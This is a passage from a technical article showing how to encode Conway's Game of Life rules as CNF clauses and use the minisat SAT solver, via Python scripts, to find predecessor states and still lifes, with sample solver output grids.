In[16]:= BooleanConvert[BooleanFunction[NewCellIsFalse,{center,a,b,c,d,e,f,g,h}],"CNF"]
Out[16]= (!a||!b||!c||d||e||f||g||h)&&(!a||!b||c||!d||e||f||g||h)&&(!a||!b||c||d||!e||f||g||h)&&
(!a||!b||c||d||e||!f||g||h)&&(!a||!b||c||d||e||f||!g||h)&&(!a||!b||c||d||e||f||g||!h)&&
(!a||!b||!center||d||e||f||g||h)&&(!a||b||!c||!d||e||f||g||h)&&(!a||b||!c||d||!e||f||g||h)&&
(!a||b||!c||d||e||!f||g||h)&&(!a||b||!c||d||e||f||!g||h)&&(!a||b||!c||d||e||f||g||!h)&&
(!a||b||c||!d||!e||f||g||h)&&(!a||b||c||!d||e||!f||g||h)&&(!a||b||c||!d||e||f||!g||h)&&
...

Using the very same way as in my "Minesweeper" example, I can convert a CNF expression to a list of clauses:

def mathematica_to_CNF (s, center, a):
    s=s.replace("center", center)
    s=s.replace("a", a[0]).replace("b", a[1]).replace("c", a[2]).replace("d", a[3])
    s=s.replace("e", a[4]).replace("f", a[5]).replace("g", a[6]).replace("h", a[7])
    s=s.replace("!", "-").replace("||", " ").replace("(", "").replace(")", "")
    s=s.split ("&&")
    return s

And again, as in "Minesweeper", there is an invisible border to make processing simpler. SAT variables are also numbered as in the previous example:

1 2 3 4 5 6 7 8 9 10 11
12 13 14 15 16 17 18 19 20 21 22
23 24 25 26 27 28 29 30 31 32 33
34 35 36 37 38 39 40 41 42 43 44
...
100 101 102 103 104 105 106 107 108 109 110
111 112 113 114 115 116 117 118 119 120 121

Also, there is a visible border, always fixed to False, to make things simpler.

Now the working source code. Whenever we encounter "*" in final_state[], we add clauses generated by the cell_is_true() function, or by cell_is_false() otherwise. When we get a solution, it is negated and added to the list of clauses, so when minisat is executed the next time, it will skip the solution which was already printed.

...
def cell_is_false (center, a): s="(!a||!b||!c||d||e||f||g||h)&&(!a||!b||c||!d||e||f||g||h)&&(!a||!b||c||d||!e||f||g||h)&&" \ "(!a||!b||c||d||e||!f||g||h)&&(!a||!b||c||d||e||f||!g||h)&&(!a||!b||c||d||e||f||g||!h)&&" \ "(!a||!b||!center||d||e||f||g||h)&&(!a||b||!c||!d||e||f||g||h)&&(!a||b||!c||d||!e||f||g||h)&&" \ "(!a||b||!c||d||e||!f||g||h)&&(!a||b||!c||d||e||f||!g||h)&&(!a||b||!c||d||e||f||g||!h)&&" \ "(!a||b||c||!d||!e||f||g||h)&&(!a||b||c||!d||e||!f||g||h)&&(!a||b||c||!d||e||f||!g||h)&&" \ "(!a||b||c||!d||e||f||g||!h)&&(!a||b||c||d||!e||!f||g||h)&&(!a||b||c||d||!e||f||!g||h)&&" \ "(!a||b||c||d||!e||f||g||!h)&&(!a||b||c||d||e||!f||!g||h)&&(!a||b||c||d||e||!f||g||!h)&&" \ "(!a||b||c||d||e||f||!g||!h)&&(!a||!c||!center||d||e||f||g||h)&&(!a||c||!center||!d||e||f||g||h)&&" \ "(!a||c||!center||d||!e||f||g||h)&&(!a||c||!center||d||e||!f||g||h)&&(!a||c||!center||d||e||f||!g||h)&&" \ "(!a||c||!center||d||e||f||g||!h)&&(a||!b||!c||!d||e||f||g||h)&&(a||!b||!c||d||!e||f||g||h)&&" \ "(a||!b||!c||d||e||!f||g||h)&&(a||!b||!c||d||e||f||!g||h)&&(a||!b||!c||d||e||f||g||!h)&&" \ "(a||!b||c||!d||!e||f||g||h)&&(a||!b||c||!d||e||!f||g||h)&&(a||!b||c||!d||e||f||!g||h)&&" \ "(a||!b||c||!d||e||f||g||!h)&&(a||!b||c||d||!e||!f||g||h)&&(a||!b||c||d||!e||f||!g||h)&&" \ "(a||!b||c||d||!e||f||g||!h)&&(a||!b||c||d||e||!f||!g||h)&&(a||!b||c||d||e||!f||g||!h)&&" \ "(a||!b||c||d||e||f||!g||!h)&&(a||b||!c||!d||!e||f||g||h)&&(a||b||!c||!d||e||!f||g||h)&&" \ "(a||b||!c||!d||e||f||!g||h)&&(a||b||!c||!d||e||f||g||!h)&&(a||b||!c||d||!e||!f||g||h)&&" \ "(a||b||!c||d||!e||f||!g||h)&&(a||b||!c||d||!e||f||g||!h)&&(a||b||!c||d||e||!f||!g||h)&&" \ "(a||b||!c||d||e||!f||g||!h)&&(a||b||!c||d||e||f||!g||!h)&&(a||b||c||!d||!e||!f||g||h)&&" \ "(a||b||c||!d||!e||f||!g||h)&&(a||b||c||!d||!e||f||g||!h)&&(a||b||c||!d||e||!f||!g||h)&&" \ "(a||b||c||!d||e||!f||g||!h)&&(a||b||c||!d||e||f||!g||!h)&&(a||b||c||d||!e||!f||!g||h)&&" \ "(a||b||c||d||!e||!f||g||!h)&&(a||b||c||d||!e||f||!g||!h)&&(a||b||c||d||e||!f||!g||!h)&&" \ 
"(!b||!c||!center||d||e||f||g||h)&&(!b||c||!center||!d||e||f||g||h)&&(!b||c||!center||d||!e||f||g||h)&&" \ "(!b||c||!center||d||e||!f||g||h)&&(!b||c||!center||d||e||f||!g||h)&&(!b||c||!center||d||e||f||g||!h)&&" \ "(b||!c||!center||!d||e||f||g||h)&&(b||!c||!center||d||!e||f||g||h)&&(b||!c||!center||d||e||!f||g||h)&&" \ "(b||!c||!center||d||e||f||!g||h)&&(b||!c||!center||d||e||f||g||!h)&&(b||c||!center||!d||!e||f||g||h)&&" \ "(b||c||!center||!d||e||!f||g||h)&&(b||c||!center||!d||e||f||!g||h)&&(b||c||!center||!d||e||f||g||!h)&&" \ "(b||c||!center||d||!e||!f||g||h)&&(b||c||!center||d||!e||f||!g||h)&&(b||c||!center||d||!e||f||g||!h)&&" \ "(b||c||!center||d||e||!f||!g||h)&&(b||c||!center||d||e||!f||g||!h)&&(b||c||!center||d||e||f||!g||!h)" return mathematica_to_CNF(s, center, a) def cell_is_true (center, a): s="(!a||!b||!c||!d)&&(!a||!b||!c||!e)&&(!a||!b||!c||!f)&&(!a||!b||!c||!g)&&(!a||!b||!c||!h)&&" \ "(!a||!b||!d||!e)&&(!a||!b||!d||!f)&&(!a||!b||!d||!g)&&(!a||!b||!d||!h)&&(!a||!b||!e||!f)&&" \ "(!a||!b||!e||!g)&&(!a||!b||!e||!h)&&(!a||!b||!f||!g)&&(!a||!b||!f||!h)&&(!a||!b||!g||!h)&&" \ "(!a||!c||!d||!e)&&(!a||!c||!d||!f)&&(!a||!c||!d||!g)&&(!a||!c||!d||!h)&&(!a||!c||!e||!f)&&" \ "(!a||!c||!e||!g)&&(!a||!c||!e||!h)&&(!a||!c||!f||!g)&&(!a||!c||!f||!h)&&(!a||!c||!g||!h)&&" \ "(!a||!d||!e||!f)&&(!a||!d||!e||!g)&&(!a||!d||!e||!h)&&(!a||!d||!f||!g)&&(!a||!d||!f||!h)&&" \ "(!a||!d||!g||!h)&&(!a||!e||!f||!g)&&(!a||!e||!f||!h)&&(!a||!e||!g||!h)&&(!a||!f||!g||!h)&&" \ "(a||b||c||center||d||e||f)&&(a||b||c||center||d||e||g)&&(a||b||c||center||d||e||h)&&" \ "(a||b||c||center||d||f||g)&&(a||b||c||center||d||f||h)&&(a||b||c||center||d||g||h)&&" \ "(a||b||c||center||e||f||g)&&(a||b||c||center||e||f||h)&&(a||b||c||center||e||g||h)&&" \ "(a||b||c||center||f||g||h)&&(a||b||c||d||e||f||g)&&(a||b||c||d||e||f||h)&&(a||b||c||d||e||g||h)&&" \ "(a||b||c||d||f||g||h)&&(a||b||c||e||f||g||h)&&(a||b||center||d||e||f||g)&&(a||b||center||d||e||f||h)&&" \ 
"(a||b||center||d||e||g||h)&&(a||b||center||d||f||g||h)&&(a||b||center||e||f||g||h)&&" \ "(a||b||d||e||f||g||h)&&(a||c||center||d||e||f||g)&&(a||c||center||d||e||f||h)&&" \ "(a||c||center||d||e||g||h)&&(a||c||center||d||f||g||h)&&(a||c||center||e||f||g||h)&&" \ "(a||c||d||e||f||g||h)&&(a||center||d||e||f||g||h)&&(!b||!c||!d||!e)&&(!b||!c||!d||!f)&&" \ "(!b||!c||!d||!g)&&(!b||!c||!d||!h)&&(!b||!c||!e||!f)&&(!b||!c||!e||!g)&&(!b||!c||!e||!h)&&" \ "(!b||!c||!f||!g)&&(!b||!c||!f||!h)&&(!b||!c||!g||!h)&&(!b||!d||!e||!f)&&(!b||!d||!e||!g)&&" \ "(!b||!d||!e||!h)&&(!b||!d||!f||!g)&&(!b||!d||!f||!h)&&(!b||!d||!g||!h)&&(!b||!e||!f||!g)&&" \ "(!b||!e||!f||!h)&&(!b||!e||!g||!h)&&(!b||!f||!g||!h)&&(b||c||center||d||e||f||g)&&" \ "(b||c||center||d||e||f||h)&&(b||c||center||d||e||g||h)&&(b||c||center||d||f||g||h)&&" \ "(b||c||center||e||f||g||h)&&(b||c||d||e||f||g||h)&&(b||center||d||e||f||g||h)&&" \ "(!c||!d||!e||!f)&&(!c||!d||!e||!g)&&(!c||!d||!e||!h)&&(!c||!d||!f||!g)&&(!c||!d||!f||!h)&&" \ "(!c||!d||!g||!h)&&(!c||!e||!f||!g)&&(!c||!e||!f||!h)&&(!c||!e||!g||!h)&&(!c||!f||!g||!h)&&" \ "(c||center||d||e||f||g||h)&&(!d||!e||!f||!g)&&(!d||!e||!f||!h)&&(!d||!e||!g||!h)&&(!d||!f||!g||!h)&&" \ "(!e||!f||!g||!h)" return mathematica_to_CNF(s, center, a) ... 
(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/GoL_SAT_utils.py)

#!/usr/bin/python

import os
from GoL_SAT_utils import *

final_state=[
" * ",
"* *",
" * "]

H=len(final_state)    # HEIGHT
W=len(final_state[0]) # WIDTH

print "HEIGHT=", H, "WIDTH=", W

VARS_TOTAL=W*H+1
VAR_FALSE=str(VARS_TOTAL)

def try_again (clauses):
    # rules for the main part of the grid
    for r in range(H):
        for c in range(W):
            if final_state[r][c]=="*":
                clauses=clauses+cell_is_true(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
            else:
                clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))

    # cells behind the visible grid must always be false:
    for c in range(-1, W+1):
        for r in [-1,H]:
            clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))
    for c in [-1,W]:
        for r in range(-1, H+1):
            clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W))

    write_CNF("tmp.cnf", clauses, VARS_TOTAL)
    print "%d clauses" % len(clauses)
    solution=run_minisat ("tmp.cnf")
    os.remove("tmp.cnf")
    if solution==None:
        print "unsat!"
        exit(0)
    grid=SAT_solution_to_grid(solution, H, W)
    print_grid(grid)
    write_RLE(grid)
    return grid

clauses=[]
# always false:
clauses.append ("-"+VAR_FALSE)

while True:
    solution=try_again(clauses)
    clauses.append(negate_clause(grid_to_clause(solution, H, W)))
    print ""

(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/reverse1.py)

Here is the result:

HEIGHT= 3 WIDTH= 3
2525 clauses
.*.
*.*
.*.
1.rle written
2526 clauses
.**
*..
*.*
2.rle written
2527 clauses
**.
..*
*.*
3.rle written
2528 clauses
*.*
*..
.**
4.rle written
2529 clauses
*.*
..*
**.
5.rle written
2530 clauses
*.*
.*.
*.*
6.rle written
2531 clauses
unsat!

The first result is the same as the initial state. Indeed: this is a "still life", i.e., a state which will never change, and it is a correct solution. The last solution is also valid.
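That the first solution really is a still life can be confirmed by stepping GoL forward once. This is a plain forward-simulation sketch of mine (not from the repository), assuming cells outside the grid are dead, just like the fixed-False border does:

```python
def step(grid):
    """One Game of Life generation; cells outside the grid are dead."""
    H, W = len(grid), len(grid[0])
    def alive(r, c):
        return 0 <= r < H and 0 <= c < W and grid[r][c] == "*"
    nxt = []
    for r in range(H):
        row = ""
        for c in range(W):
            n = sum(alive(r+dr, c+dc)
                    for dr in (-1, 0, 1) for dc in (-1, 0, 1)
                    if (dr, dc) != (0, 0))
            if alive(r, c):
                row += "*" if n in (2, 3) else "."   # survives or dies
            else:
                row += "*" if n == 3 else "."        # born or stays dead
        nxt.append(row)
    return nxt

tub = [".*.", "*.*", ".*."]
print(step(tub) == tub)  # True: the state reproduces itself
```

The same function also shows the vertical bar flipping to a horizontal one, which is the oscillator behaviour discussed below.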
Now the problem: the 2nd, 3rd, 4th and 5th solutions are equivalent to each other; they are just mirrored or rotated. In fact, these are reflectional92 (like in a mirror) and rotational93 symmetries. We can solve this easily: we will take each solution, reflect and rotate it, and add the results, negated, to the list of clauses, so minisat will skip them during its work:

...
while True:
    solution=try_again(clauses)
    clauses.append(negate_clause(grid_to_clause(solution, H, W)))
    clauses.append(negate_clause(grid_to_clause(reflect_vertically(solution), H, W)))
    clauses.append(negate_clause(grid_to_clause(reflect_horizontally(solution), H, W)))
    # is this square?
    if W==H:
        clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,1), H, W)))
        clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,2), H, W)))
        clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,3), H, W)))
    print ""
...

(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/reverse2.py)

The functions reflect_vertically(), reflect_horizontally() and rotate_square_array() are simple array manipulation routines.

Now we get just 3 solutions:

HEIGHT= 3 WIDTH= 3
2525 clauses
.*.
*.*
.*.
1.rle written
2531 clauses
.**
*..
*.*
2.rle written
2537 clauses
*.*
.*.
*.*
3.rle written
2543 clauses
unsat!

92https://en.wikipedia.org/wiki/Reflection_symmetry
93https://en.wikipedia.org/wiki/Rotational_symmetry

This one has only one single ancestor:

final_state=[
" * ",
" * ",
" * "]

HEIGHT= 3 WIDTH= 3
2503 clauses
...
***
...
1.rle written
2509 clauses
unsat!

This is an oscillator, of course. How many states can lead to such a picture?

final_state=[
" * ",
" ",
" ** ",
" * ",
" * ",
" *** "]

28; here are a few of them:

HEIGHT= 6 WIDTH= 5
5217 clauses
.*.*.
..*..
.**.*
..*..
..*.*
.**..
1.rle written
5220 clauses
.*.*.
..*..
.**.*
..*..
*.*.*
.**..
2.rle written
5223 clauses
..*.*
..**.
.**..
....*
*.*.*
.**..
3.rle written
5226 clauses
..*.*
..**.
.**..
*...*
..*.*
.**..
4.rle written
...
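The reflect/rotate helpers used above are not shown in the text; the following sketch is a plausible implementation of mine, working on grids represented as lists of strings (the versions in GoL_SAT_utils.py may differ in detail):

```python
def reflect_vertically(grid):
    # flip rows: top row becomes bottom row
    return grid[::-1]

def reflect_horizontally(grid):
    # flip columns: each row reversed
    return [row[::-1] for row in grid]

def rotate_square_array(grid, times):
    # rotate a square grid 90 degrees clockwise, 'times' times:
    # new row r is old column r, read bottom-to-top
    for _ in range(times):
        grid = ["".join(row[c] for row in reversed(grid))
                for c in range(len(grid))]
    return grid

g = [".**", "*..", "*.*"]
print(rotate_square_array(g, 4) == g)  # True: four rotations = identity
```

With these, negating the 2 reflections and 3 extra rotations of each solution removes all 8 symmetric duplicates of a square grid.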
Now the biggest one, a "space invader":

final_state=[
" ",
" * * ",
" * * ",
" ******* ",
" ** *** ** ",
" *********** ",
" * ******* * ",
" * * * * ",
" ** ** ",
" "]

HEIGHT= 10 WIDTH= 13
16469 clauses
..*.*.**.....
.....*****...
....**..*....
......*...*..
..**...*.*...
.*..*.*.**..*
*....*....*.*
..*.*..*.....
..*.....*.*..
....**..*.*..
1.rle written
16472 clauses
*.*.*.**.....
.....*****...
....**..*....
......*...*..
..**...*.*...
.*..*.*.**..*
*....*....*.*
..*.*..*.....
..*.....*.*..
....**..*.*..
2.rle written
16475 clauses
..*.*.**.....
*....*****...
....**..*....
......*...*..
..**...*.*...
.*..*.*.**..*
*....*....*.*
..*.*..*.....
..*.....*.*..
....**..*.*..
3.rle written
...

I don't know how many possible states can lead to the "space invader"; perhaps too many. I had to stop it. It also slows down during execution, because the number of clauses keeps increasing (due to the addition of negated solutions).

All solutions are also exported to RLE files, which can be opened by Golly94.

94http://golly.sourceforge.net/

11.4.2 Finding "still lives"

A "still life" in terms of GoL is a state which doesn't change at all.

First, using the previous definitions, we will define a truth table of a function which will return true if the center cell of the next state is the same as it has been in the previous state, i.e., hasn't changed:

In[17]:= stillife=Flatten[Table[Join[{center},PadLeft[IntegerDigits[neighbours,2],8]]-> Boole[Boole[newcell[center,neighbours]]==center],{neighbours,0,255},{center,0,1}]]
Out[17]= {{0,0,0,0,0,0,0,0,0}->1,
{1,0,0,0,0,0,0,0,0}->0,
{0,0,0,0,0,0,0,0,1}->1,
{1,0,0,0,0,0,0,0,1}->0,
...
In[18]:= BooleanConvert[BooleanFunction[stillife,{center,a,b,c,d,e,f,g,h}],"CNF"] Out[18]= (!a||!b||!c||!center||!d)&&(!a||!b||!c||!center||!e)&&(!a||!b||!c||!center||!f)&& (!a||!b||!c||!center||!g)&&(!a||!b||!c||!center||!h)&&(!a||!b||!c||center||d||e||f||g||h)&& (!a||!b||c||center||!d||e||f||g||h)&&(!a||!b||c||center||d||!e||f||g||h)&&(!a||!b||c||center||d||e||!f||g||h)&& (!a||!b||c||center||d||e||f||!g||h)&&(!a||!b||c||center||d||e||f||g||!h)&&(!a||!b||!center||!d||!e)&& ... #!/usr/bin/python import os from GoL_SAT_utils import * W=3 # WIDTH H=3 # HEIGHT VARS_TOTAL=W*H+1 VAR_FALSE=str(VARS_TOTAL) def stillife (center, a): s="(!a||!b||!c||!center||!d)&&(!a||!b||!c||!center||!e)&&(!a||!b||!c||!center||!f)&&" \ "(!a||!b||!c||!center||!g)&&(!a||!b||!c||!center||!h)&&(!a||!b||!c||center||d||e||f||g||h)&&" \ "(!a||!b||c||center||!d||e||f||g||h)&&(!a||!b||c||center||d||!e||f||g||h)&&" \ "(!a||!b||c||center||d||e||!f||g||h)&&(!a||!b||c||center||d||e||f||!g||h)&&" \ "(!a||!b||c||center||d||e||f||g||!h)&&(!a||!b||!center||!d||!e)&&(!a||!b||!center||!d||!f)&&" \ "(!a||!b||!center||!d||!g)&&(!a||!b||!center||!d||!h)&&(!a||!b||!center||!e||!f)&&" \ "(!a||!b||!center||!e||!g)&&(!a||!b||!center||!e||!h)&&(!a||!b||!center||!f||!g)&&" \ "(!a||!b||!center||!f||!h)&&(!a||!b||!center||!g||!h)&&(!a||b||!c||center||!d||e||f||g||h)&&" \ "(!a||b||!c||center||d||!e||f||g||h)&&(!a||b||!c||center||d||e||!f||g||h)&&" \ "(!a||b||!c||center||d||e||f||!g||h)&&(!a||b||!c||center||d||e||f||g||!h)&&" \ "(!a||b||c||center||!d||!e||f||g||h)&&(!a||b||c||center||!d||e||!f||g||h)&&" \ "(!a||b||c||center||!d||e||f||!g||h)&&(!a||b||c||center||!d||e||f||g||!h)&&" \ "(!a||b||c||center||d||!e||!f||g||h)&&(!a||b||c||center||d||!e||f||!g||h)&&" \ "(!a||b||c||center||d||!e||f||g||!h)&&(!a||b||c||center||d||e||!f||!g||h)&&" \ "(!a||b||c||center||d||e||!f||g||!h)&&(!a||b||c||center||d||e||f||!g||!h)&&" \ "(!a||!c||!center||!d||!e)&&(!a||!c||!center||!d||!f)&&(!a||!c||!center||!d||!g)&&" \ 
"(!a||!c||!center||!d||!h)&&(!a||!c||!center||!e||!f)&&(!a||!c||!center||!e||!g)&&" \ "(!a||!c||!center||!e||!h)&&(!a||!c||!center||!f||!g)&&(!a||!c||!center||!f||!h)&&" \ "(!a||!c||!center||!g||!h)&&(!a||!center||!d||!e||!f)&&(!a||!center||!d||!e||!g)&&" \ "(!a||!center||!d||!e||!h)&&(!a||!center||!d||!f||!g)&&(!a||!center||!d||!f||!h)&&" \ "(!a||!center||!d||!g||!h)&&(!a||!center||!e||!f||!g)&&(!a||!center||!e||!f||!h)&&" \ "(!a||!center||!e||!g||!h)&&(!a||!center||!f||!g||!h)&&(a||!b||!c||center||!d||e||f||g||h)&&" \ "(a||!b||!c||center||d||!e||f||g||h)&&(a||!b||!c||center||d||e||!f||g||h)&&" \ "(a||!b||!c||center||d||e||f||!g||h)&&(a||!b||!c||center||d||e||f||g||!h)&&" \ "(a||!b||c||center||!d||!e||f||g||h)&&(a||!b||c||center||!d||e||!f||g||h)&&" \ "(a||!b||c||center||!d||e||f||!g||h)&&(a||!b||c||center||!d||e||f||g||!h)&&" \ "(a||!b||c||center||d||!e||!f||g||h)&&(a||!b||c||center||d||!e||f||!g||h)&&" \ "(a||!b||c||center||d||!e||f||g||!h)&&(a||!b||c||center||d||e||!f||!g||h)&&" \ "(a||!b||c||center||d||e||!f||g||!h)&&(a||!b||c||center||d||e||f||!g||!h)&&" \ "(a||b||!c||center||!d||!e||f||g||h)&&(a||b||!c||center||!d||e||!f||g||h)&&" \ "(a||b||!c||center||!d||e||f||!g||h)&&(a||b||!c||center||!d||e||f||g||!h)&&" \ "(a||b||!c||center||d||!e||!f||g||h)&&(a||b||!c||center||d||!e||f||!g||h)&&" \ "(a||b||!c||center||d||!e||f||g||!h)&&(a||b||!c||center||d||e||!f||!g||h)&&" \ "(a||b||!c||center||d||e||!f||g||!h)&&(a||b||!c||center||d||e||f||!g||!h)&&" \ "(a||b||c||!center||d||e||f||g)&&(a||b||c||!center||d||e||f||h)&&" \ "(a||b||c||!center||d||e||g||h)&&(a||b||c||!center||d||f||g||h)&&" \ "(a||b||c||!center||e||f||g||h)&&(a||b||c||center||!d||!e||!f||g||h)&&" \ "(a||b||c||center||!d||!e||f||!g||h)&&(a||b||c||center||!d||!e||f||g||!h)&&" \ "(a||b||c||center||!d||e||!f||!g||h)&&(a||b||c||center||!d||e||!f||g||!h)&&" \ "(a||b||c||center||!d||e||f||!g||!h)&&(a||b||c||center||d||!e||!f||!g||h)&&" \ "(a||b||c||center||d||!e||!f||g||!h)&&(a||b||c||center||d||!e||f||!g||!h)&&" 
\ "(a||b||c||center||d||e||!f||!g||!h)&&(a||b||!center||d||e||f||g||h)&&" \ "(a||c||!center||d||e||f||g||h)&&(!b||!c||!center||!d||!e)&&(!b||!c||!center||!d||!f)&&" \ "(!b||!c||!center||!d||!g)&&(!b||!c||!center||!d||!h)&&(!b||!c||!center||!e||!f)&&" \ "(!b||!c||!center||!e||!g)&&(!b||!c||!center||!e||!h)&&(!b||!c||!center||!f||!g)&&" \ "(!b||!c||!center||!f||!h)&&(!b||!c||!center||!g||!h)&&(!b||!center||!d||!e||!f)&&" \ 141 "(!b||!center||!d||!e||!g)&&(!b||!center||!d||!e||!h)&&(!b||!center||!d||!f||!g)&&" \ "(!b||!center||!d||!f||!h)&&(!b||!center||!d||!g||!h)&&(!b||!center||!e||!f||!g)&&" \ "(!b||!center||!e||!f||!h)&&(!b||!center||!e||!g||!h)&&(!b||!center||!f||!g||!h)&&" \ "(b||c||!center||d||e||f||g||h)&&(!c||!center||!d||!e||!f)&&(!c||!center||!d||!e||!g)&&" \ "(!c||!center||!d||!e||!h)&&(!c||!center||!d||!f||!g)&&(!c||!center||!d||!f||!h)&&" \ "(!c||!center||!d||!g||!h)&&(!c||!center||!e||!f||!g)&&(!c||!center||!e||!f||!h)&&" \ "(!c||!center||!e||!g||!h)&&(!c||!center||!f||!g||!h)&&(!center||!d||!e||!f||!g)&&" \ "(!center||!d||!e||!f||!h)&&(!center||!d||!e||!g||!h)&&(!center||!d||!f||!g||!h)&&" \ "(!center||!e||!f||!g||!h)" return mathematica_to_CNF(s, center, a) def try_again (clauses): # rules for the main part of grid for r in range(H): for c in range(W): clauses=clauses+stillife(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W)) # cells behind visible grid must always be false: for c in range(-1, W+1): for r in [-1,H]: clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W)) for c in [-1,W]: for r in range(-1, H+1): clauses=clauses+cell_is_false(coords_to_var(r, c, H, W), get_neighbours(r, c, H, W)) write_CNF("tmp.cnf", clauses, VARS_TOTAL) print "%d clauses" % len(clauses) solution=run_minisat ("tmp.cnf") os.remove("tmp.cnf") if solution==None: print "unsat!" 
        exit(0)
    grid=SAT_solution_to_grid(solution, H, W)
    print_grid(grid)
    write_RLE(grid)
    return grid

clauses=[]
# always false:
clauses.append ("-"+VAR_FALSE)

while True:
    solution=try_again(clauses)
    clauses.append(negate_clause(grid_to_clause(solution, H, W)))
    clauses.append(negate_clause(grid_to_clause(reflect_vertically(solution), H, W)))
    clauses.append(negate_clause(grid_to_clause(reflect_horizontally(solution), H, W)))
    # is this square?
    if W==H:
        clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,1), H, W)))
        clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,2), H, W)))
        clauses.append(negate_clause(grid_to_clause(rotate_square_array(solution,3), H, W)))
    print ""

(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/stillife1.py )

What do we get for 2x2?

1881 clauses
..
..
1.rle written
1887 clauses
**
**
2.rle written
1893 clauses
unsat!

Both solutions are correct: an empty square will progress into an empty square (no cells are born), and the 2x2 box is a well-known "still life".

What about a 3x3 square?

2887 clauses
...
...
...
1.rle written
2893 clauses
.**
.**
...
2.rle written
2899 clauses
.**
*.*
**.
3.rle written
2905 clauses
.*.
*.*
**.
4.rle written
2911 clauses
.*.
*.*
.*.
5.rle written
2917 clauses
unsat!

Here is a problem: we see the familiar 2x2 box again, but shifted. It is indeed a correct solution, but we are not interested in it, because we have already seen it.

What we can do is add another condition: we can force minisat to find only solutions with no empty rows and columns. This is easy. These are the SAT variables for a 5x5 square:

1 2 3 4 5
6 7 8 9 10
11 12 13 14 15
16 17 18 19 20
21 22 23 24 25

Each clause is an "OR" clause, so all we have to do is add 5 clauses:

1 OR 2 OR 3 OR 4 OR 5
6 OR 7 OR 8 OR 9 OR 10
...

That means that each row must have at least one True value somewhere. We can do the same for each column as well.

...
# each row must contain at least one cell!
for r in range(H):
    clauses.append(" ".join([coords_to_var(r, c, H, W) for c in range(W)]))
# each column must contain at least one cell!
for c in range(W):
    clauses.append(" ".join([coords_to_var(r, c, H, W) for r in range(H)]))
...

(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/stillife2.py )

Now we can see that the 3x3 square has 3 possible "still lives":

2893 clauses
.*.
*.*
**.
1.rle written
2899 clauses
.*.
*.*
.*.
2.rle written
2905 clauses
.**
*.*
**.
3.rle written
2911 clauses
unsat!

The 4x4 square has 7:

4169 clauses
..**
...*
***.
*...
1.rle written
4175 clauses
..**
..*.
*.*.
**..
2.rle written
4181 clauses
..**
.*.*
*.*.
**..
3.rle written
4187 clauses
..*.
.*.*
*.*.
**..
4.rle written
4193 clauses
.**.
*..*
*.*.
.*..
5.rle written
4199 clauses
..*.
.*.*
*.*.
.*..
6.rle written
4205 clauses
.**.
*..*
*..*
.**.
7.rle written
4211 clauses
unsat!

When I try large squares, like 20x20, funny things happen. First of all, minisat finds solutions that are not very pleasing aesthetically, but still correct, like:

61033 clauses
....**.**.**.**.**.*
**..*.**.**.**.**.**
*...................
.*..................
**..................
*...................
.*..................
**..................
*...................
.*..................
**..................
*...................
.*..................
**..................
*...................
.*..................
..*.................
...*................
***.................
*...................
1.rle written
...

Indeed: all rows and columns have at least one True value.

Then minisat begins to add smaller "still lives" into the whole picture:

61285 clauses
.**....**...**...**.
.**...*..*.*.*...*..
.......**...*......*
..................**
...**............*..
...*.*...........*..
....*.*........**...
**...*.*...**..*....
*.*...*....*....*...
.*..........****.*..
................*...
..*...**..******....
.*.*..*..*..........
*..*...*.*..****....
***.***..*.*....*...
....*..***.**..**...
**.*..*.............
.*.**.**..........**
*..*..*..*......*..*
**..**..**......**..
43.rle written

In other words, the result is a square consisting of smaller "still lives". Minisat then alters these parts slightly, shifting them back and forth.
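Each already-seen solution is banned via negate_clause(grid_to_clause(...)), but those two helpers are not printed in the text either. A hypothetical sketch of the idea (my own guess at an implementation, assuming row-major variable numbering starting at 1, as in the 5x5 table earlier, and clauses kept as space-separated strings of DIMACS-style literals):

```python
# Hypothetical helpers (only the names follow the article): a found
# solution becomes a conjunction of literals, and its negation is a
# single OR-clause with every literal inverted, which is false only
# for that one assignment.

def coords_to_var(r, c, H, W):
    # row-major numbering starting at 1, as in the 5x5 variable table
    return str(r * W + c + 1)

def grid_to_clause(grid, H, W):
    # one literal per cell: positive if alive ('*'), negative if dead
    lits = []
    for r in range(H):
        for c in range(W):
            v = coords_to_var(r, c, H, W)
            lits.append(v if grid[r][c] == "*" else "-" + v)
    return " ".join(lits)

def negate_clause(clause):
    # invert every literal of the clause
    def inv(lit):
        return lit[1:] if lit.startswith("-") else "-" + lit
    return " ".join(inv(l) for l in clause.split())

block = ["**",
         "**"]
print(negate_clause(grid_to_clause(block, 2, 2)))  # -1 -2 -3 -4
```

Since a clause is a disjunction, the negated clause rules out exactly the one assignment that produced it, so minisat is forced to produce a different grid on the next iteration.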
Is it cheating? Anyway, it does this in strict accordance with the rules we defined. But we want a denser picture.

We can add a rule: in every 5-cell chunk there must be at least one True cell. To achieve this, we just split the whole square into 5-cell chunks and add a clause for each:

...
# make result denser:
lst=[]
for r in range(H):
    for c in range(W):
        lst.append(coords_to_var(r, c, H, W))
# divide them all by chunks and add to clauses:
CHUNK_LEN=5
for c in list_partition(lst,len(lst)/CHUNK_LEN):
    tmp=" ".join(c)
    clauses.append(tmp)
...

(https://github.com/dennis714/SAT_SMT_article/blob/master/SAT/GoL/stillife.py )

This is indeed denser:

61113 clauses
..**.**......*.*.*..
...*.*.....***.**.*.
...*..*...*.......*.
....*.*..*.*......**
...**.*.*..*...**.*.
..*...*.***.....*.*.
...*.*.*......*..*..
****.*..*....*.**...
*....**.*....*.*....
...**..*...**..*....
..*..*....*....*.**.
.*.*.**....****.*..*
..*.*....*.*..*..**.
....*.****..*..*.*..
....**....*.*.**..*.
*.**...****.*..*.**.
**...**.....**.*....
...**..*..**..*.**.*
